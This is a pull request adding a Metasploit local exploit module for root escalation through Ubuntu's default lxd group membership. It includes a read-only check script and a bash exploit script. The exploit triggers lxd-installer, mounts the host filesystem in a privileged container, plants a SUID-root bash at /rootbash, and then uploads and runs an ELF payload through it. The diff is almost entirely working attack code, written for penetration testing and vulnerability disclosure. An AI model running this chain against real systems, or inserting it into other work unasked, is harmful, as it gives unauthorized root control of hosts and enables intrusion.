### PR TITLE
Add new LXD group privilege escalation module

### DIFF
--- a/data/exploits/lxd_group_lpe_ubuntu/check.sh
+++ b/data/exploits/lxd_group_lpe_ubuntu/check.sh
@@ -1,0 +1,29 @@
+
+#!/usr/bin/env bash
+# Original file: https://github.com/star-sg/lxd-group-privesc-report/blob/main/poc/check-vulnerable.sh
+# check-vulnerable.sh — is this host exposed to the `lxd`-group → root LPE?
+# Read-only: checks group membership and whether a root-run LXD path exists.
+# Exits 0 if vulnerable, 1 if not.
+
+set -u
+
+# Color helpers (green for safe, red for vulnerable; plain when not a TTY).
+if [ -t 1 ]; then G=$'\033[1;32m'; R=$'\033[1;31m'; Z=$'\033[0m'; else G=''; R=''; Z=''; fi
+safe() { echo "${G}$*${Z}"; }
+vuln() { echo "${R}$*${Z}"; }
+
+# 1. Anyone unprivileged in the root-equivalent `lxd` group?
+members=$(getent group lxd | cut -d: -f4)
+echo "lxd group members: ${members:-<none>}"
+[ -z "$members" ] && { safe "SAFE: no one is in the lxd group."; exit 1; }
+
+# 2. A root-run LXD path they can reach? Either LXD is already installed,
+#    or the lxd-installer socket can socket-activate the root installer.
+if command -v lxc >/dev/null 2>&1 || [ -S /run/lxd-installer.socket ]; then
+    vuln "VULNERABLE: members of lxd can escalate to root without a password."
+    echo "  reachable via: $( [ -S /run/lxd-installer.socket ] && echo lxd-installer.socket || echo 'installed LXD' )"
+    exit 0
+fi
+
+safe "SAFE: lxd has members but no LXD daemon or installer socket to reach."
+exit 1

--- a/data/exploits/lxd_group_lpe_ubuntu/exploit.sh
+++ b/data/exploits/lxd_group_lpe_ubuntu/exploit.sh
@@ -1,0 +1,151 @@
+#!/usr/bin/env bash
+# Original file: https://github.com/star-sg/lxd-group-privesc-report/blob/main/poc/exploit.sh
+# exploit.sh — Local Privilege Escalation to root via default `lxd` group membership.
+# 
+# Run as an unprivileged user that is a member of the `lxd` group (the Ubuntu
+# installer-created primary account qualifies by default). No sudo password is
+# required at any point.
+#
+# Chain:
+#   1. If LXD is not yet installed, just run `lxc` and answer "yes" to the
+#      lxd-installer prompt — the root-run shim installs and initializes the
+#      LXD snap for us. No manual socket poke, no `lxd init`.
+#   2. Launch a privileged container with the host root filesystem bind-mounted.
+#   3. From inside the container (running as real host root) drop a SUID-root
+#      copy of bash onto the host filesystem.
+#   4. Execute the SUID shell on the host to obtain an interactive root shell.
+#
+# Tested on Ubuntu 26.04 LTS Server (kernel 7.0.0-15-generic).
+#
+set -euo pipefail
+
+CONTAINER="privesc-$$"
+POOL="privesc-pool-$$"          # throwaway pool; removed in cleanup() if we make it
+POOL_CREATED=0
+PROFILE_ROOT_ADDED=0           # 1 if WE added the root disk to the default profile
+ROOTBASH="/rootbash"
+IMAGE_ALIAS="osimg"
+UPSTREAM_IMAGE="ubuntu:24.04"
+
+log()  { printf '\033[1;32m[*]\033[0m %s\n' "$*"; }
+warn() { printf '\033[1;33m[!]\033[0m %s\n' "$*"; }
+die()  { printf '\033[1;31m[x]\033[0m %s\n' "$*" >&2; exit 1; }
+
+cleanup() {
+    log "Cleaning up container ${CONTAINER}"
+    lxc delete --force "${CONTAINER}" >/dev/null 2>&1 || true
+    # Revert the default-profile root disk before deleting the pool it points at.
+    if [ "${PROFILE_ROOT_ADDED}" -eq 1 ]; then
+        log "Removing root disk added to the default profile"
+        lxc profile device remove default root >/dev/null 2>&1 || true
+    fi
+    if [ "${POOL_CREATED}" -eq 1 ]; then
+        log "Removing throwaway storage pool ${POOL}"
+        lxc storage delete "${POOL}" >/dev/null 2>&1 || true
+    fi
+}
+
+require_lxd_group() {
+    if ! id -nG "$(id -un)" | tr ' ' '\n' | grep -qx lxd; then
+        die "Current user is not in the 'lxd' group — this PoC does not apply."
+    fi
+    log "User $(id -un) is a member of the 'lxd' group."
+}
+
+# ---------------------------------------------------------------------------
+# Step 1 — ensure LXD is installed and initialized.
+#
+# On Ubuntu, /usr/bin/lxc is the lxd-installer shim: the first time an
+# lxd-group user runs it, it prompts "Do you want to install LXD? (yes/no)".
+# Answering "Y" makes the root-run shim install and `lxd init` the LXD snap for
+# us, then re-exec the real lxc. One piped invocation is all it takes.
+# ---------------------------------------------------------------------------
+ensure_lxd() {
+    if lxc info >/dev/null 2>&1; then
+        log "LXD already available."
+        return
+    fi
+
+    log "Triggering lxd-installer via 'lxc' (answering yes to the install prompt)."
+    echo Y | lxc list >/dev/null 2>&1 || true
+
+    log "Waiting for LXD to come up..."
+    for _ in $(seq 1 60); do
+        if lxc info >/dev/null 2>&1; then
+            log "LXD is up."
+            return
+        fi
+        sleep 2
+    done
+    die "LXD did not become available after the installer prompt."
+}
+
+# ---------------------------------------------------------------------------
+# Prepare a local image (needs network on first use only).
+# ---------------------------------------------------------------------------
+prepare_image() {
+    if lxc image show "${IMAGE_ALIAS}" >/dev/null 2>&1; then
+        log "Image '${IMAGE_ALIAS}' already present locally."
+        return
+    fi
+    log "Copying ${UPSTREAM_IMAGE} -> local:${IMAGE_ALIAS} (requires network)."
+    lxc image copy "${UPSTREAM_IMAGE}" local: --alias "${IMAGE_ALIAS}"
+}
+
+# ---------------------------------------------------------------------------
+# Steps 2-3 — privileged container, host / mounted, drop SUID-root bash.
+# ---------------------------------------------------------------------------
+escalate() {
+    trap cleanup EXIT
+
+    # The lxd-installer's auto-init leaves no storage pool and no root disk on
+    # the `default` profile, so `lxc init` would fail with "No root disk device
+    # found". Reuse an existing pool if there is one; otherwise create a
+    # throwaway `dir` pool. The root disk is attached inline to THIS container
+    # (not the shared profile), so nothing persists beyond cleanup().
+    local pool=""
+    pool="$(lxc storage list -f csv 2>/dev/null | cut -d, -f1 | grep -v '^NAME$' || true)"
+    pool="$(printf '%s\n' "${pool}" | head -n1)"
+    if [ -z "${pool}" ]; then
+        log "No storage pool found — creating throwaway 'dir' pool ${POOL}."
+        lxc storage create "${POOL}" dir >/dev/null
+        POOL_CREATED=1
+        pool="${POOL}"
+    fi
+    log "Using storage pool '${pool}' for the container root disk."
+
+    # `lxc init` refuses to create the instance record unless a root disk is
+    # resolvable at creation time — it can't be added afterwards. The auto-init
+    # left the `default` profile with no root device, so add one there now.
+    # We record that we did and strip it back out in cleanup(), so the profile
+    # is restored to its original (empty) state and later inits aren't broken.
+    if ! lxc profile device show default 2>/dev/null | grep -q '^root:'; then
+        log "Adding root disk to the default profile (reverted on exit)."
+        lxc profile device add default root disk pool="${pool}" path=/ >/dev/null
+        PROFILE_ROOT_ADDED=1
+    fi
+
+    log "Creating privileged container ${CONTAINER}."
+    lxc init "${IMAGE_ALIAS}" "${CONTAINER}" -c security.privileged=true
+    lxc config device add "${CONTAINER}" hostroot disk source=/ path=/mnt/host
+    lxc start "${CONTAINER}"
+
+    log "Planting SUID-root shell on host via the container (real host root)."
+    lxc exec "${CONTAINER}" -- /bin/sh -c \
+        "cp /mnt/host/bin/bash /mnt/host${ROOTBASH} && chmod 4755 /mnt/host${ROOTBASH}"
+}
+
+main() {
+    require_lxd_group
+    ensure_lxd
+    prepare_image
+    escalate
+
+    if [ -u "${ROOTBASH}" ]; then
+        log "Success — SUID-root shell planted at ${ROOTBASH}."
+    else
+        die "Expected SUID shell at ${ROOTBASH} was not created."
+    fi
+}
+
+main "$@"

--- a/modules/exploits/linux/local/lxd_group_priv_esc.rb
+++ b/modules/exploits/linux/local/lxd_group_priv_esc.rb
@@ -68,13 +68,11 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     command = File.read(File.join(Msf::Config.data_directory, 'exploits', 'lxd_group_lpe_ubuntu', 'check.sh'))
-    output = run_script(command)
+    output = run_script(command).to_s
     vprint_status("Check output: #{output}")
-    if output.include?('VULNERABLE')
-      return CheckCode::Appears
-    else
-      return CheckCode::Safe
-    end
+    return CheckCode::Unknown('Check script produced no output; unable to determine vulnerability.') if output.empty?
+
+    output.include?('VULNERABLE') ? CheckCode::Appears('Detected lxd-group LPE conditions for the current session.') : CheckCode::Safe('Did not detect lxd-group LPE conditions for the current session.')
   end
 
   def exploit

--- a/modules/exploits/linux/local/lxd_group_priv_esc.rb
+++ b/modules/exploits/linux/local/lxd_group_priv_esc.rb
@@ -1,0 +1,100 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::Architecture
+  include Msf::Post::Process
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'LXD Group Privilege Escalation for Ubuntu',
+        'Description' => %q{
+          Ubuntu Server's default install silently grants the primary user membership in the
+          lxd group, a group that by LXD's trust model equals passwordless root. Moreover,
+          that unprivileged user can install and set up LXD on their own via the lxd-installer
+          package without any additional privilege, so the root-equivalent group is reachable
+          end to end without ever touching the sudo password. This module exploits the chain
+          by triggering on-demand LXD installation (if needed), creating a privileged container
+          with the host root filesystem mounted, and planting a SUID-root shell on the host.
+          Affected versions include Ubuntu Server 24.04 LTS and later (including 26.04) where
+          lxd-installer is seeded by default. Server releases before 24.04 (20.04, 22.04,
+          23.10) that pre-seeded the LXD snap are also likely affected.
+        },
+        'References' => [
+          ['URL', 'https://github.com/star-sg/lxd-group-privesc-report'],
+        ],
+        'Author' => [
+          'Weiming Shi (swing)', # STAR Labs SG - Discovery and PoC
+          'n132',                # STAR Labs SG
+          'Diego Ledda'          # Metasploit module
+        ],
+        'DisclosureDate' => '2026-04-29',
+        'License' => MSF_LICENSE,
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Targets' => [
+          [
+            'Linux Command',
+            {
+              'Platform' => ['linux', 'unix'],
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def run_script(script)
+    base64_script = Rex::Text.encode_base64(script)
+    create_process(
+      '/bin/bash',
+      args: ['-c', "echo #{base64_script} | base64 -d | bash"],
+      time_out: 5 * 60 # 5 minutes
+    )
+  end
+
+  def check
+    command = File.read(File.join(Msf::Config.data_directory, 'exploits', 'lxd_group_lpe_ubuntu', 'check.sh'))
+    output = run_script(command)
+    vprint_status("Check output: #{output}")
+    if output.include?('VULNERABLE')
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe
+    end
+  end
+
+  def exploit
+    os_architecture = get_os_architecture
+    unless [ ARCH_X64, ARCH_AARCH64 ].include?(os_architecture)
+      fail_with(Failure::NoTarget, "#{os_architecture} targets are not supported.")
+    end
+    command = File.read(File.join(Msf::Config.data_directory, 'exploits', 'lxd_group_lpe_ubuntu', 'exploit.sh'))
+    output = run_script(command)
+    vprint_status("Exploit output: #{output}")
+    unless output.include?('SUID-root shell planted')
+      fail_with(Failure::Unknown, 'The exploit did not complete successfully. Check the output for details.')
+    end
+    cmd_payload = framework.payloads.create("linux/#{os_architecture}/exec")
+    fail_with(Failure::NoTarget, "#{os_architecture} targets are not supported.") if cmd_payload.nil? || !cmd_payload.options.key?('PrependSetuid')
+    cmd_payload.datastore['CMD'] = payload.encoded
+    cmd_payload.datastore['PrependSetuid'] = true
+    elf = cmd_payload.generate_simple('Format' => 'elf')
+    payload_path = "/tmp/#{rand_text_alpha(8)}.elf"
+    upload_and_chmodx(payload_path, elf)
+    create_process('/rootbash', args: ['-p', '-c', payload_path])
+  end
+end


### PR DESCRIPTION
Suggestion: https://github.com/rapid7/metasploit-framework/issues/21556 by @jvoisin 

This pull request adds a new local privilege escalation exploit module targeting Ubuntu systems where users in the `lxd` group can escalate to root without a password. It introduces both the Metasploit module and the required bash scripts to check for and exploit the vulnerability.

**New Exploit Module:**

* Added a new Metasploit local exploit module `lxd_group_priv_esc.rb` that targets Ubuntu systems with users in the `lxd` group, leveraging LXD and lxd-installer to escalate privileges to root. The module checks for vulnerability, triggers LXD installation if necessary, launches a privileged container, and plants a SUID-root shell for exploitation.

**Helper Scripts:**

* Added `check.sh`, a bash script to determine if the current host is vulnerable by checking `lxd` group membership and the presence of a root-accessible LXD path.
* Added `exploit.sh`, a bash script that performs the full exploitation chain: ensures LXD is installed, prepares a privileged container with the host filesystem mounted, and drops a SUID-root shell on the host.